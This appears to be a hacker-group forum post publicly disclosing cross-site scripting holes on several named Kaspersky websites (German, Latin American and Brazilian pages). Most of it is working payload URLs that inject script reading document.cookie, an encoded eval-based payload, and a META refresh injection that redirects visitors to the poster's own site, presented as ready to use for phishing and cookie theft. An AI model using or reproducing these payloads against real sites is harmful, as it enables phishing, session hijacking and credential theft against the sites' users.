Nemesis Our Projects Forums Extra Controls
  RegMe



Kaspersky Still Insecure



Critical XSS (Cross Site Scripting) still works on Kaspersky.com



        This Bug can be exploited by malicious people to conduct phishing attacks.
        An attacker can steal cookie based authentication credentials.

        Screenshot:

http://img171.imageshack.us/img171/7514/82986971.jpg

http://img171.imageshack.us/img171/5240/37261602.jpg

        Vulnerable Page:

Code:
http://www.kaspersky.com/de/partner_"><script>alert(document.cookie)</script>



        More XSS vulnerable pages:

Code:
http://www.kaspersky.com/de/hosted_"><script>alert("test")</script>



http://img17.imageshack.us/img17/8462/87441197.jpg

Code:
http://www.kaspersky.com/de/anti-virus_linux_"><script>alert(document.cookie)</script>


        Update: Brasilian and Portuguese Kaspersky Websites Vulnerable Also - http://latam.kaspersky.com .

        Redirect right here:

Code:
http://latam.kaspersky.com/search/?q="<META HTTP-EQUIV="refresh" content="0; URL=http://nemesis.te-home.net">


        XSS:

Code:
http://latam.kaspersky.com/search/?q=%22%3C/style%3E%3Cscript%3Ea=eval;b=alert;a(b(/XSS/.source));%3C/script%3E%27%22%3E%3Cmarquee%3E%3Ch1%3E%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E%20%3C/h1%3E%3C/marquee%3E


http://img19.imageshack.us/img19/2025/51277174.jpg

        http://brazil.kaspersky.com - Brasilian Kaspersky Website - XSS:

Code:
http://brazil.kaspersky.com/search/?q=%3C/style%3E%3Cscript%3Ea=eval;b=alert;a(b(/XSS/.source));%3C/script%3E'%22%3E%3Cmarquee%3E%3Ch1%3E%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%20%3C/h1%3E%3C/marquee%3E


http://img168.imageshack.us/img168/772/40853786.jpg

Submitted by [-TE-]-Methodman


1 Comments


You need to be logged in to be able to post comments